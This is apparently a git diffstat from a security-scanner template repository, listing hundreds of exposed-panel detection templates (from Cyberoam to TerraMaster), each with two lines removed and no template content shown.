http/exposed-panels/cyberoam-ssl-vpn-panel.yaml | 2 -- http/exposed-panels/d-link-wireless.yaml | 2 -- http/exposed-panels/darktrace-threat-visualizer.yaml | 2 -- http/exposed-panels/datadog-login.yaml | 2 -- http/exposed-panels/dataiku-panel.yaml | 2 -- http/exposed-panels/davantis-panel.yaml | 2 -- http/exposed-panels/daybyday-panel.yaml | 2 -- http/exposed-panels/defectdojo-panel.yaml | 2 -- http/exposed-panels/dell-openmanager-login.yaml | 2 -- http/exposed-panels/dell-wyse-login.yaml | 2 -- http/exposed-panels/delta-login-panel.yaml | 2 -- http/exposed-panels/deluge-webui-panel.yaml | 2 -- http/exposed-panels/dericam-login.yaml | 2 -- http/exposed-panels/digitalrebar-login.yaml | 2 -- http/exposed-panels/directadmin-login-panel.yaml | 2 -- http/exposed-panels/directum-login.yaml | 2 -- http/exposed-panels/django-admin-panel.yaml | 2 -- http/exposed-panels/docebo-elearning-panel.yaml | 2 -- http/exposed-panels/dolibarr-panel.yaml | 2 -- http/exposed-panels/dotclear-panel.yaml | 2 -- http/exposed-panels/dotcms-admin-panel.yaml | 2 -- http/exposed-panels/dplus-dashboard.yaml | 2 -- http/exposed-panels/dqs-superadmin-panel.yaml | 2 -- http/exposed-panels/dradis-pro-panel.yaml | 2 -- http/exposed-panels/drawio-flowchartmaker-panel.yaml | 2 -- http/exposed-panels/drone-ci-panel.yaml | 2 -- http/exposed-panels/druid-console-exposure.yaml | 2 -- http/exposed-panels/druid-panel.yaml | 2 -- http/exposed-panels/drupal-login.yaml | 2 -- http/exposed-panels/dynamicweb-panel.yaml | 2 -- http/exposed-panels/dynatrace-panel.yaml | 2 -- http/exposed-panels/dzzoffice/dzzoffice-install.yaml | 2 -- http/exposed-panels/dzzoffice/dzzoffice-panel.yaml | 2 -- http/exposed-panels/e-mobile-panel.yaml | 2 -- http/exposed-panels/eMerge-panel.yaml | 2 -- http/exposed-panels/ecosys-command-center.yaml | 2 -- http/exposed-panels/edgeos-login.yaml | 2 -- http/exposed-panels/eko-management-console-login.yaml | 2 -- http/exposed-panels/eko-software-update-panel.yaml | 2 -- http/exposed-panels/elemiz-network-manager.yaml | 2 -- http/exposed-panels/emby-panel.yaml | 2 -- http/exposed-panels/emerson-power-panel.yaml | 2 -- http/exposed-panels/emessage-panel.yaml | 2 -- http/exposed-panels/ems-webclient-panel.yaml | 2 -- http/exposed-panels/entrust-identityguard.yaml | 2 -- http/exposed-panels/episerver-panel.yaml | 2 -- http/exposed-panels/epson-access-detect.yaml | 2 -- http/exposed-panels/epson-projector-detect.yaml | 2 -- http/exposed-panels/epson-web-control-detect.yaml | 2 -- http/exposed-panels/esphome-panel.yaml | 2 -- http/exposed-panels/esxi-system.yaml | 2 -- http/exposed-panels/eventum-panel.yaml | 2 -- http/exposed-panels/ewm-manager-panel.yaml | 2 -- http/exposed-panels/exagrid-manager-panel.yaml | 2 -- http/exposed-panels/exolis-engage-panel.yaml | 2 -- http/exposed-panels/exposed-webalizer.yaml | 2 -- http/exposed-panels/extreme-netconfig-ui.yaml | 2 -- http/exposed-panels/extron-cms-panel.yaml | 2 -- http/exposed-panels/ez-publish-panel.yaml | 2 -- http/exposed-panels/f-secure-policy-manager.yaml | 2 -- http/exposed-panels/faraday-login.yaml | 2 -- http/exposed-panels/fastapi-docs.yaml | 2 -- http/exposed-panels/fastpanel-hosting-control-panel.yaml | 2 -- http/exposed-panels/fatpipe-ipvpn-panel.yaml | 2 -- http/exposed-panels/fatpipe-mpvpn-panel.yaml | 2 -- http/exposed-panels/fatpipe-warp-panel.yaml | 2 -- http/exposed-panels/fiori-launchpad.yaml | 2 -- http/exposed-panels/fiorilaunchpad-logon.yaml | 2 -- http/exposed-panels/fireware-xtm-user-authentication.yaml | 2 -- http/exposed-panels/flahscookie-superadmin-panel.yaml | 2 -- http/exposed-panels/flightpath-panel.yaml | 2 -- http/exposed-panels/flink-exposure.yaml | 2 -- http/exposed-panels/flip-cms-panel.yaml | 2 -- http/exposed-panels/flowci-panel.yaml | 2 -- http/exposed-panels/flureedb-admin-console.yaml | 2 -- http/exposed-panels/footprints-panel.yaml | 2 -- http/exposed-panels/forcepoint-applicance.yaml | 2 -- http/exposed-panels/forcepoint.yaml | 2 -- http/exposed-panels/forti/fortiadc-panel.yaml | 2 -- http/exposed-panels/fortinet/fortiap-panel.yaml | 2 -- http/exposed-panels/fortinet/fortimail-panel.yaml | 2 -- http/exposed-panels/fortinet/fortinet-fortigate-panel.yaml | 2 -- http/exposed-panels/fortinet/fortinet-fortimanager-panel.yaml | 2 -- http/exposed-panels/fortinet/fortinet-fortinac-panel.yaml | 2 -- http/exposed-panels/fortinet/fortinet-panel.yaml | 2 -- http/exposed-panels/fortinet/fortios-management-panel.yaml | 2 -- http/exposed-panels/fortinet/fortios-panel.yaml | 2 -- http/exposed-panels/fortinet/fortitester-login-panel.yaml | 2 -- http/exposed-panels/fortinet/fortiweb-panel.yaml | 2 -- http/exposed-panels/freeipa-panel.yaml | 2 -- http/exposed-panels/freepbx-administration-panel.yaml | 2 -- http/exposed-panels/froxlor-management-panel.yaml | 2 -- http/exposed-panels/ftm-manager-panel.yaml | 2 -- http/exposed-panels/fuelcms-panel.yaml | 2 -- http/exposed-panels/fuji-xerox-printer-detect.yaml | 2 -- http/exposed-panels/gargoyle-router.yaml | 2 -- http/exposed-panels/genweb-plus-panel.yaml | 2 -- http/exposed-panels/geoserver-login-panel.yaml | 2 -- http/exposed-panels/gerapy-detect.yaml | 2 -- http/exposed-panels/gespage-panel.yaml | 2 -- http/exposed-panels/gira-homeserver-homepage.yaml | 2 -- http/exposed-panels/git-repository-browser.yaml | 2 -- http/exposed-panels/gitblit-panel.yaml | 2 -- http/exposed-panels/gitea-login.yaml | 2 -- http/exposed-panels/github-enterprise-detect.yaml | 2 -- http/exposed-panels/gitlab-detect.yaml | 2 -- http/exposed-panels/globalprotect-panel.yaml | 2 -- http/exposed-panels/glpi-panel.yaml | 2 -- http/exposed-panels/go-anywhere-client.yaml | 2 -- http/exposed-panels/goanywhere-mft-login.yaml | 2 -- http/exposed-panels/gocd-login.yaml | 2 -- http/exposed-panels/gocron-panel.yaml | 2 -- http/exposed-panels/gogs-panel.yaml | 2 -- http/exposed-panels/gophish-login.yaml | 2 -- http/exposed-panels/gradle/gradle-cache-node-detect.yaml | 2 -- http/exposed-panels/gradle/gradle-enterprise-panel.yaml | 2 -- http/exposed-panels/grails-database-admin-console.yaml | 2 -- http/exposed-panels/graphite-browser.yaml | 2 -- http/exposed-panels/group-ib-panel.yaml | 2 -- http/exposed-panels/gryphon-login.yaml | 2 -- http/exposed-panels/gyra-master-admin.yaml | 2 -- http/exposed-panels/h2console-panel.yaml | 2 -- http/exposed-panels/hadoop-exposure.yaml | 2 -- http/exposed-panels/hangfire-dashboard.yaml | 2 -- http/exposed-panels/harbor-panel.yaml | 2 -- http/exposed-panels/hashicorp-consul-agent.yaml | 2 -- http/exposed-panels/hashicorp-consul-webgui.yaml | 2 -- http/exposed-panels/hestia-panel.yaml | 2 -- http/exposed-panels/highmail-admin-panel.yaml | 2 -- http/exposed-panels/hitron-technologies.yaml | 2 -- http/exposed-panels/hivemanager-login-panel.yaml | 2 -- http/exposed-panels/hmc-hybris-panel.yaml | 2 -- http/exposed-panels/homematic-panel.yaml | 2 -- http/exposed-panels/honeywell-web-controller.yaml | 2 -- http/exposed-panels/honeywell-xl-web-controller.yaml | 2 -- http/exposed-panels/horde-login-panel.yaml | 2 -- http/exposed-panels/horde-webmail-login.yaml | 2 -- http/exposed-panels/hospital-management-panel.yaml | 2 -- http/exposed-panels/hp-ilo-5.yaml | 2 -- http/exposed-panels/hp-service-manager.yaml | 2 -- http/exposed-panels/hp-virtual-connect-manager.yaml | 2 -- http/exposed-panels/hpe-system-management-login.yaml | 2 -- http/exposed-panels/httpbin-panel.yaml | 2 -- http/exposed-panels/huawei-hg532e-panel.yaml | 2 -- http/exposed-panels/hybris-administration-console.yaml | 2 -- http/exposed-panels/hydra-dashboard.yaml | 2 -- http/exposed-panels/hypertest-dashboard.yaml | 2 -- http/exposed-panels/i-mscp-panel.yaml | 2 -- http/exposed-panels/ibm/ibm-advanced-system-management.yaml | 2 -- http/exposed-panels/ibm/ibm-maximo-login.yaml | 2 -- http/exposed-panels/ibm/ibm-mqseries-web-console.yaml | 2 -- http/exposed-panels/ibm/ibm-note-login.yaml | 2 -- http/exposed-panels/ibm/ibm-security-access-manager.yaml | 2 -- http/exposed-panels/ibm/ibm-service-assistant.yaml | 2 -- http/exposed-panels/ibm/ibm-websphere-admin-panel.yaml | 2 -- http/exposed-panels/ibm/ibm-websphere-panel.yaml | 2 -- http/exposed-panels/icc-pro-login.yaml | 2 -- http/exposed-panels/icewarp-panel-detect.yaml | 2 -- http/exposed-panels/icinga-web-login.yaml | 2 -- http/exposed-panels/ictprotege-login-panel.yaml | 2 -- http/exposed-panels/identity-services-engine.yaml | 2 -- http/exposed-panels/ilch-admin-panel.yaml | 2 -- http/exposed-panels/ilias-panel.yaml | 2 -- http/exposed-panels/incapptic-connect-panel.yaml | 2 -- http/exposed-panels/influxdb-panel.yaml | 2 -- http/exposed-panels/intelbras-login.yaml | 2 -- http/exposed-panels/intelbras-panel.yaml | 2 -- http/exposed-panels/intellian-aptus-panel.yaml | 2 -- http/exposed-panels/intelliflash-login-panel.yaml | 2 -- http/exposed-panels/iomega-emc-shared-nas.yaml | 2 -- http/exposed-panels/ipdiva-mediation-panel.yaml | 2 -- http/exposed-panels/iptime-router.yaml | 2 -- http/exposed-panels/issabel-login.yaml | 2 -- http/exposed-panels/istat-panel-detect.yaml | 2 -- http/exposed-panels/itop-panel.yaml | 2 -- http/exposed-panels/ixbus/ixbusweb-version.yaml | 2 -- http/exposed-panels/ixcache-panel.yaml | 2 -- http/exposed-panels/jamf-login.yaml | 2 -- http/exposed-panels/jamf-panel.yaml | 2 -- http/exposed-panels/jamf-setup-assistant.yaml | 2 -- http/exposed-panels/jaspersoft-panel.yaml | 2 -- http/exposed-panels/jboss/jboss-jbpm-admin.yaml | 2 -- http/exposed-panels/jboss/jboss-juddi.yaml | 2 -- http/exposed-panels/jboss/jboss-soa-platform.yaml | 2 -- http/exposed-panels/jboss/jmx-console.yaml | 2 -- http/exposed-panels/jboss/wildfly-panel.yaml | 2 -- http/exposed-panels/jcms-panel.yaml | 2 -- http/exposed-panels/jeedom-panel.yaml | 2 -- http/exposed-panels/jenkins-api-panel.yaml | 2 -- http/exposed-panels/jenkins-login.yaml | 2 -- http/exposed-panels/jfrog-login.yaml | 2 -- http/exposed-panels/joget/joget-panel.yaml | 2 -- http/exposed-panels/joomla-panel.yaml | 2 -- http/exposed-panels/jumpserver-panel.yaml | 2 -- http/exposed-panels/jupyter-notebook.yaml | 2 -- http/exposed-panels/kafka-center-login.yaml | 2 -- http/exposed-panels/kafka-connect-ui.yaml | 2 -- http/exposed-panels/kafka-consumer-monitor.yaml | 2 -- http/exposed-panels/kafka-monitoring.yaml | 2 -- http/exposed-panels/kafka-topics-ui.yaml | 2 -- http/exposed-panels/kanboard-login.yaml | 2 -- http/exposed-panels/kavita-panel-detect.yaml | 2 -- http/exposed-panels/keenetic-web-login.yaml | 2 -- http/exposed-panels/kenesto-login.yaml | 2 -- http/exposed-panels/kentico-login.yaml | 2 -- http/exposed-panels/kerio-connect-client.yaml | 2 -- http/exposed-panels/kettle-panel.yaml | 2 -- http/exposed-panels/keycloak-admin-panel.yaml | 2 -- http/exposed-panels/kfm/kaes-file-manager.yaml | 2 -- http/exposed-panels/kfm/kfm-login-panel.yaml | 2 -- http/exposed-panels/kibana-panel.yaml | 2 -- http/exposed-panels/kiwitcms-login.yaml | 2 -- http/exposed-panels/kkfileview-panel.yaml | 2 -- http/exposed-panels/konga-panel.yaml | 2 -- http/exposed-panels/kraken-cluster-monitoring.yaml | 2 -- http/exposed-panels/kronos-workforce-central.yaml | 2 -- http/exposed-panels/kubernetes-dashboard.yaml | 2 -- http/exposed-panels/kubernetes-enterprise-manager.yaml | 2 -- http/exposed-panels/kubernetes-mirantis.yaml | 2 -- http/exposed-panels/kubernetes-web-view.yaml | 2 -- http/exposed-panels/kubeview-dashboard.yaml | 2 -- http/exposed-panels/labkey-server-login.yaml | 2 -- http/exposed-panels/labtech-panel.yaml | 2 -- http/exposed-panels/lacie-panel.yaml | 2 -- http/exposed-panels/lancom-router-panel.yaml | 2 -- http/exposed-panels/landrayoa-panel.yaml | 2 -- http/exposed-panels/lansweeper-login.yaml | 2 -- http/exposed-panels/lantronix-webmanager-panel.yaml | 2 -- http/exposed-panels/laravel-filemanager.yaml | 2 -- http/exposed-panels/ldap-account-manager-panel.yaml | 2 -- http/exposed-panels/lenovo-fp-panel.yaml | 2 -- http/exposed-panels/lenovo-thinkserver-panel.yaml | 2 -- http/exposed-panels/leostream-panel.yaml | 2 -- http/exposed-panels/librenms-login.yaml | 2 -- http/exposed-panels/liferay-portal.yaml | 2 -- http/exposed-panels/linkerd-panel.yaml | 2 -- http/exposed-panels/linksys-wifi-login.yaml | 2 -- http/exposed-panels/livehelperchat-admin-panel.yaml | 2 -- http/exposed-panels/livezilla-login-panel.yaml | 2 -- http/exposed-panels/locklizard-webviewer-panel.yaml | 2 -- http/exposed-panels/logitech-harmony-portal.yaml | 2 -- http/exposed-panels/looker-panel.yaml | 2 -- http/exposed-panels/loxone-panel.yaml | 2 -- http/exposed-panels/lucee-login.yaml | 2 -- http/exposed-panels/luci-login-detection.yaml | 2 -- http/exposed-panels/mach-proweb-login.yaml | 2 -- http/exposed-panels/machform-admin-panel.yaml | 2 -- http/exposed-panels/maestro-login-panel.yaml | 2 -- http/exposed-panels/mag-dashboard-panel.yaml | 2 -- http/exposed-panels/magento-admin-panel.yaml | 2 -- http/exposed-panels/magento-downloader-panel.yaml | 2 -- http/exposed-panels/magnolia-panel.yaml | 2 -- http/exposed-panels/mailhog-panel.yaml | 2 -- http/exposed-panels/mailwatch-login.yaml | 2 -- http/exposed-panels/mantisbt-panel.yaml | 2 -- http/exposed-panels/matomo-login-portal.yaml | 2 -- http/exposed-panels/mautic-crm-panel.yaml | 2 -- http/exposed-panels/meshcentral-login.yaml | 2 -- http/exposed-panels/metabase-panel.yaml | 2 -- http/exposed-panels/metasploit-setup-page.yaml | 2 -- http/exposed-panels/metersphere-login.yaml | 2 -- http/exposed-panels/mfiles-web-detect.yaml | 2 -- http/exposed-panels/microfocus-admin-server.yaml | 2 -- http/exposed-panels/microfocus-filr-panel.yaml | 2 -- http/exposed-panels/microfocus-vibe-panel.yaml | 2 -- http/exposed-panels/microsoft-exchange-panel.yaml | 2 -- http/exposed-panels/mikrotik/mikrotik-routeros-old.yaml | 2 -- http/exposed-panels/mikrotik/mikrotik-routeros.yaml | 2 -- http/exposed-panels/mini-start-page.yaml | 2 -- http/exposed-panels/minio-browser.yaml | 2 -- http/exposed-panels/minio-console.yaml | 2 -- http/exposed-panels/mitel-panel-detect.yaml | 2 -- http/exposed-panels/mobile-management-panel.yaml | 2 -- http/exposed-panels/mobileiron-login.yaml | 2 -- http/exposed-panels/modoboa-panel.yaml | 2 -- http/exposed-panels/mongodb-ops-manager.yaml | 2 -- http/exposed-panels/monitorix-exposure.yaml | 2 -- http/exposed-panels/monstra-admin-panel.yaml | 2 -- http/exposed-panels/movable-type-login.yaml | 2 -- http/exposed-panels/mpftvc-admin-panel.yaml | 2 -- http/exposed-panels/ms-adcs-detect.yaml | 2 -- http/exposed-panels/mspcontrol-login.yaml | 2 -- http/exposed-panels/mybb-forum-detect.yaml | 2 -- http/exposed-panels/mybb/mybb-forum-install.yaml | 2 -- http/exposed-panels/mylittleadmin-panel.yaml | 2 -- http/exposed-panels/mylittlebackup-panel.yaml | 2 -- http/exposed-panels/nagios-panel.yaml | 2 -- http/exposed-panels/nagios-xi-panel.yaml | 2 -- http/exposed-panels/nagvis-panel.yaml | 2 -- http/exposed-panels/ncentral-panel.yaml | 2 -- http/exposed-panels/nconf-panel.yaml | 2 -- http/exposed-panels/neo4j-browser.yaml | 2 -- http/exposed-panels/neobox-panel.yaml | 2 -- http/exposed-panels/neos-panel.yaml | 2 -- http/exposed-panels/nessus-panel.yaml | 2 -- http/exposed-panels/netdata-dashboard-detected.yaml | 2 -- http/exposed-panels/netdata-panel.yaml | 2 -- http/exposed-panels/netflix-conductor-ui.yaml | 2 -- http/exposed-panels/netgear-version-detect.yaml | 2 -- http/exposed-panels/netis-router.yaml | 2 -- http/exposed-panels/netlify-cms.yaml | 2 -- http/exposed-panels/netris-dashboard-panel.yaml | 2 -- http/exposed-panels/netscaler-aaa-login.yaml | 2 -- http/exposed-panels/netscaler-gateway.yaml | 2 -- http/exposed-panels/netsparker-panel.yaml | 2 -- http/exposed-panels/netsus-server-login.yaml | 2 -- http/exposed-panels/nginx-admin-panel.yaml | 2 -- http/exposed-panels/nginx-ui-dashboard.yaml | 2 -- http/exposed-panels/noescape-login.yaml | 2 -- http/exposed-panels/nordex-wind-farm-portal.yaml | 2 -- http/exposed-panels/normhost-backup-server-manager.yaml | 2 -- http/exposed-panels/novnc-login-panel.yaml | 2 -- http/exposed-panels/nozomi-panel.yaml | 2 -- http/exposed-panels/np-data-cache.yaml | 2 -- http/exposed-panels/nport-web-console.yaml | 2 -- http/exposed-panels/nsq-admin-panel.yaml | 2 -- http/exposed-panels/nutanix-web-console-login.yaml | 2 -- http/exposed-panels/nuxeo-platform-panel.yaml | 2 -- http/exposed-panels/nzbget-panel.yaml | 2 -- http/exposed-panels/o2-easy-panel.yaml | 2 -- http/exposed-panels/ocomon-panel.yaml | 2 -- http/exposed-panels/ocs-inventory-login.yaml | 2 -- http/exposed-panels/officekeeper-admin-login.yaml | 2 -- http/exposed-panels/oipm-detect.yaml | 2 -- http/exposed-panels/oki-data.yaml | 2 -- http/exposed-panels/okiko-sfiler-portal.yaml | 2 -- http/exposed-panels/okta-panel.yaml | 2 -- http/exposed-panels/olt-web-interface.yaml | 2 -- http/exposed-panels/omniampx-panel.yaml | 2 -- http/exposed-panels/open-game-panel.yaml | 2 -- http/exposed-panels/open-stack-dashboard-login.yaml | 2 -- http/exposed-panels/open-virtualization-manager-panel.yaml | 2 -- http/exposed-panels/openam-panel.yaml | 2 -- http/exposed-panels/openbmcs-detect.yaml | 2 -- http/exposed-panels/opencart-panel.yaml | 2 -- http/exposed-panels/opencast-detect.yaml | 2 -- http/exposed-panels/opencats-panel.yaml | 2 -- http/exposed-panels/opencpu-panel.yaml | 2 -- http/exposed-panels/openemr-detect.yaml | 2 -- http/exposed-panels/openerp-database.yaml | 2 -- http/exposed-panels/openfire-admin-panel.yaml | 2 -- http/exposed-panels/opengear-panel.yaml | 2 -- http/exposed-panels/opennebula-panel.yaml | 2 -- http/exposed-panels/opennms-web-console.yaml | 2 -- http/exposed-panels/opensis-panel.yaml | 2 -- http/exposed-panels/openvpn-admin.yaml | 2 -- http/exposed-panels/openvpn-connect.yaml | 2 -- http/exposed-panels/openvpn-monitor.yaml | 2 -- http/exposed-panels/openvpn-router-management.yaml | 2 -- http/exposed-panels/openvz-web-login.yaml | 2 -- http/exposed-panels/openx-panel.yaml | 2 -- http/exposed-panels/oracle-business-control.yaml | 2 -- http/exposed-panels/oracle-business-intelligence.yaml | 2 -- http/exposed-panels/oracle-containers-panel.yaml | 2 -- http/exposed-panels/oracle-enterprise-manager-login.yaml | 2 -- http/exposed-panels/oracle-integrated-manager.yaml | 2 -- http/exposed-panels/oracle-people-enterprise.yaml | 2 -- http/exposed-panels/oracle-people-sign-in.yaml | 2 -- http/exposed-panels/orchid-vms-panel.yaml | 2 -- http/exposed-panels/osticket-panel.yaml | 2 -- http/exposed-panels/osticket/osticket-install.yaml | 2 -- http/exposed-panels/otobo-panel.yaml | 2 -- http/exposed-panels/ourmgmt3-panel.yaml | 2 -- http/exposed-panels/pacs-connexion-utilisateur.yaml | 2 -- http/exposed-panels/pagespeed-global-admin.yaml | 2 -- http/exposed-panels/panabit-panel.yaml | 2 -- http/exposed-panels/pandora-fms-console.yaml | 2 -- http/exposed-panels/parallels-html-client.yaml | 2 -- http/exposed-panels/parallels/parallels-hsphere-detect.yaml | 2 -- http/exposed-panels/parse-dashboard.yaml | 2 -- http/exposed-panels/payroll-management-system-panel.yaml | 2 -- http/exposed-panels/pega-web-panel.yaml | 2 -- http/exposed-panels/pentaho-panel.yaml | 2 -- http/exposed-panels/persis-panel.yaml | 2 -- http/exposed-panels/pfsense-login.yaml | 2 -- http/exposed-panels/pgadmin-exposure.yaml | 2 -- http/exposed-panels/phabricator-login.yaml | 2 -- http/exposed-panels/phoronix-pane.yaml | 2 -- http/exposed-panels/php-mailer.yaml | 2 -- http/exposed-panels/phpcollab-panel.yaml | 2 -- http/exposed-panels/phpldap-admin.yaml | 2 -- http/exposed-panels/phpminiadmin-panel.yaml | 2 -- http/exposed-panels/phpmyadmin-panel.yaml | 2 -- http/exposed-panels/phppgadmin-panel.yaml | 2 -- http/exposed-panels/pichome-panel.yaml | 2 -- http/exposed-panels/piwigo-panel.yaml | 2 -- http/exposed-panels/planet-estream-panel.yaml | 2 -- http/exposed-panels/plastic-scm-login.yaml | 2 -- http/exposed-panels/plesk-obsidian-login.yaml | 2 -- http/exposed-panels/plesk-onyx-login.yaml | 2 -- http/exposed-panels/polycom-admin-detect.yaml | 2 -- http/exposed-panels/polycom-login.yaml | 2 -- http/exposed-panels/posthog-admin-panel.yaml | 2 -- http/exposed-panels/powerjob-panel.yaml | 2 -- http/exposed-panels/powerlogic-ion.yaml | 2 -- http/exposed-panels/privx-panel.yaml | 2 -- http/exposed-panels/processwire-login.yaml | 2 -- http/exposed-panels/project-insight-login.yaml | 2 -- http/exposed-panels/projectsend-login.yaml | 2 -- http/exposed-panels/prometheus-exposed-panel.yaml | 2 -- http/exposed-panels/prometheus-pushgateway-exposed-panel.yaml | 2 -- http/exposed-panels/pulsar-admin-console.yaml | 2 -- http/exposed-panels/pulsar-adminui-panel.yaml | 2 -- http/exposed-panels/pulsar360-admin-panel.yaml | 2 -- http/exposed-panels/pulse-secure-panel.yaml | 2 -- http/exposed-panels/puppetboard-panel.yaml | 2 -- http/exposed-panels/pure-storage-login.yaml | 2 -- http/exposed-panels/pypicloud-panel.yaml | 2 -- http/exposed-panels/qlik-sense-server.yaml | 2 -- http/exposed-panels/qmail-admin-login.yaml | 2 -- http/exposed-panels/qnap/qnap-photostation-panel.yaml | 2 -- http/exposed-panels/qnap/qnap-qts-panel.yaml | 2 -- http/exposed-panels/qualcomm-voip-router.yaml | 2 -- http/exposed-panels/qualtrics-login.yaml | 2 -- http/exposed-panels/quantum-scalar-detect.yaml | 2 -- http/exposed-panels/r-webserver-login.yaml | 2 -- http/exposed-panels/rabbitmq-dashboard.yaml | 2 -- http/exposed-panels/racksnet-login.yaml | 2 -- http/exposed-panels/radius-manager.yaml | 2 -- http/exposed-panels/rancher-panel.yaml | 2 -- http/exposed-panels/raspberrymatic-panel.yaml | 2 -- http/exposed-panels/redash-panel.yaml | 2 -- http/exposed-panels/redhat/redhat-satellite-panel.yaml | 2 -- http/exposed-panels/redis-commander-exposure.yaml | 2 -- http/exposed-panels/remedy-axis-login.yaml | 2 -- http/exposed-panels/remkon-manager-panel.yaml | 2 -- http/exposed-panels/remote-ui-login.yaml | 2 -- http/exposed-panels/residential-gateway-login.yaml | 2 -- http/exposed-panels/retool-login.yaml | 2 -- http/exposed-panels/riseup-panel.yaml | 2 -- http/exposed-panels/room-alert-detect.yaml | 2 -- http/exposed-panels/roxy-fileman.yaml | 2 -- http/exposed-panels/royalevent-management-panel.yaml | 2 -- http/exposed-panels/rsa-self-service.yaml | 2 -- http/exposed-panels/rstudio-detect.yaml | 2 -- http/exposed-panels/ruckus-unleashed-panel.yaml | 2 -- http/exposed-panels/ruckus-wireless-admin-login.yaml | 2 -- http/exposed-panels/ruijie/rg-uac-panel.yaml | 2 -- http/exposed-panels/rundeck-login.yaml | 2 -- http/exposed-panels/rustici-content-controller.yaml | 2 -- http/exposed-panels/saferoads-vms-login.yaml | 2 -- http/exposed-panels/sage-panel.yaml | 2 -- http/exposed-panels/saltgui-panel.yaml | 2 -- http/exposed-panels/saltstack-config-panel.yaml | 2 -- http/exposed-panels/samba-swat-panel.yaml | 2 -- http/exposed-panels/samsung-printer-detect.yaml | 2 -- http/exposed-panels/sap-cloud-analytics.yaml | 2 -- http/exposed-panels/sap-hana-xsengine-panel.yaml | 2 -- http/exposed-panels/sap-netweaver-portal.yaml | 2 -- http/exposed-panels/sap-successfactors-detect.yaml | 2 -- http/exposed-panels/sapfiori-panel.yaml | 2 -- http/exposed-panels/sas-login-panel.yaml | 2 -- http/exposed-panels/sauter-login.yaml | 2 -- http/exposed-panels/scs-landfill-control.yaml | 2 -- http/exposed-panels/seafile-panel.yaml | 2 -- http/exposed-panels/seats-login.yaml | 2 -- http/exposed-panels/secmail-detect.yaml | 2 -- http/exposed-panels/secnet-ac-panel.yaml | 2 -- http/exposed-panels/secure-login-panel.yaml | 2 -- http/exposed-panels/securenvoy-panel.yaml | 2 -- http/exposed-panels/securepoint-utm.yaml | 2 -- http/exposed-panels/securityspy-detect.yaml | 2 -- http/exposed-panels/seeddms-panel.yaml | 2 -- http/exposed-panels/selenium-grid.yaml | 2 -- http/exposed-panels/selenoid-ui-exposure.yaml | 2 -- http/exposed-panels/sensu-panel.yaml | 2 -- http/exposed-panels/sentinelone-console.yaml | 2 -- http/exposed-panels/sequoiadb-login.yaml | 2 -- http/exposed-panels/server-backup-login.yaml | 2 -- http/exposed-panels/server-backup-manager-se.yaml | 2 -- http/exposed-panels/servicedesk-login-panel.yaml | 2 -- http/exposed-panels/sgp-login-panel.yaml | 2 -- http/exposed-panels/sharecenter-login.yaml | 2 -- http/exposed-panels/shoutcast-server.yaml | 2 -- http/exposed-panels/sicom-panel.yaml | 2 -- http/exposed-panels/sidekiq-dashboard.yaml | 2 -- http/exposed-panels/signet-explorer-dashboard.yaml | 2 -- http/exposed-panels/sitecore-login-panel.yaml | 2 -- http/exposed-panels/sitecore-login.yaml | 2 -- http/exposed-panels/sitefinity-login.yaml | 2 -- http/exposed-panels/siteomat-login.yaml | 2 -- http/exposed-panels/skycaiji-admin-panel.yaml | 2 -- http/exposed-panels/slocum-login.yaml | 2 -- http/exposed-panels/smartping-dashboard.yaml | 2 -- http/exposed-panels/solarview-compact-panel.yaml | 2 -- http/exposed-panels/solarwinds-orion.yaml | 2 -- http/exposed-panels/solarwinds-servuftp-detect.yaml | 2 -- http/exposed-panels/solr-panel-exposure.yaml | 2 -- http/exposed-panels/somansa-dlp-detect.yaml | 2 -- http/exposed-panels/somfy-login.yaml | 2 -- http/exposed-panels/sonarqube-login.yaml | 2 -- http/exposed-panels/sonic-wall-application.yaml | 2 -- http/exposed-panels/sonicwall-analyzer-login.yaml | 2 -- http/exposed-panels/sonicwall-management-panel.yaml | 2 -- http/exposed-panels/sonicwall-sslvpn-panel.yaml | 2 -- http/exposed-panels/sophos-fw-version-detect.yaml | 2 -- http/exposed-panels/sophos-mobile-panel.yaml | 2 -- http/exposed-panels/spark-panel.yaml | 2 -- http/exposed-panels/sphider-login.yaml | 2 -- http/exposed-panels/spiderfoot.yaml | 2 -- http/exposed-panels/splunk-enterprise-panel.yaml | 2 -- http/exposed-panels/splunk-login.yaml | 2 -- http/exposed-panels/sql-monitor.yaml | 2 -- http/exposed-panels/sqlbuddy-panel.yaml | 2 -- http/exposed-panels/squirrelmail-login.yaml | 2 -- http/exposed-panels/sqwebmail-login-panel.yaml | 2 -- http/exposed-panels/star-network-utility.yaml | 2 -- http/exposed-panels/start-element-manager-panel.yaml | 2 -- http/exposed-panels/steve-login-panel.yaml | 2 -- http/exposed-panels/storybook-panel.yaml | 2 -- http/exposed-panels/strapi-documentation.yaml | 2 -- http/exposed-panels/strapi-panel.yaml | 2 -- http/exposed-panels/stridercd-panel.yaml | 2 -- http/exposed-panels/submitty-login.yaml | 2 -- http/exposed-panels/subrion-login.yaml | 2 -- http/exposed-panels/sugarcrm-panel.yaml | 2 -- http/exposed-panels/sungrow-logger1000-detect.yaml | 2 -- http/exposed-panels/superadmin-ui-panel.yaml | 2 -- http/exposed-panels/supermicro-bmc-panel.yaml | 2 -- http/exposed-panels/superset-login.yaml | 2 -- http/exposed-panels/supervpn-panel.yaml | 2 -- http/exposed-panels/symantec/symantec-dlp-login.yaml | 2 -- http/exposed-panels/symantec/symantec-epm-login.yaml | 2 -- http/exposed-panels/symantec/symantec-ewep-login.yaml | 2 -- .../exposed-panels/symantec/symantec-pgp-global-directory.yaml | 2 -- http/exposed-panels/synapse-mobility-panel.yaml | 2 -- http/exposed-panels/syncthru-web-service.yaml | 2 -- http/exposed-panels/synnefo-admin-panel.yaml | 2 -- http/exposed-panels/sysaid-panel.yaml | 2 -- http/exposed-panels/tableau-panel.yaml | 2 -- http/exposed-panels/tableau-service-manager.yaml | 2 -- http/exposed-panels/teamcity-login-panel.yaml | 2 -- http/exposed-panels/teampass-panel.yaml | 2 -- http/exposed-panels/tectuus-scada-monitor.yaml | 2 -- http/exposed-panels/tekton-dashboard.yaml | 2 -- http/exposed-panels/telerik-server-login.yaml | 2 -- http/exposed-panels/telesquare/tlr-2005ksh-login.yaml | 2 -- http/exposed-panels/teltonika-login.yaml | 2 -- http/exposed-panels/tembosocial-panel.yaml | 2 -- http/exposed-panels/temenos-t24-login.yaml | 2 -- http/exposed-panels/tenda-11n-wireless-router-login.yaml | 2 -- http/exposed-panels/tenda-web-master.yaml | 2 -- http/exposed-panels/teradici-pcoip-panel.yaml | 2 -- http/exposed-panels/terraform-enterprise-panel.yaml | 2 -- http/exposed-panels/terramaster-login.yaml | 2 -- 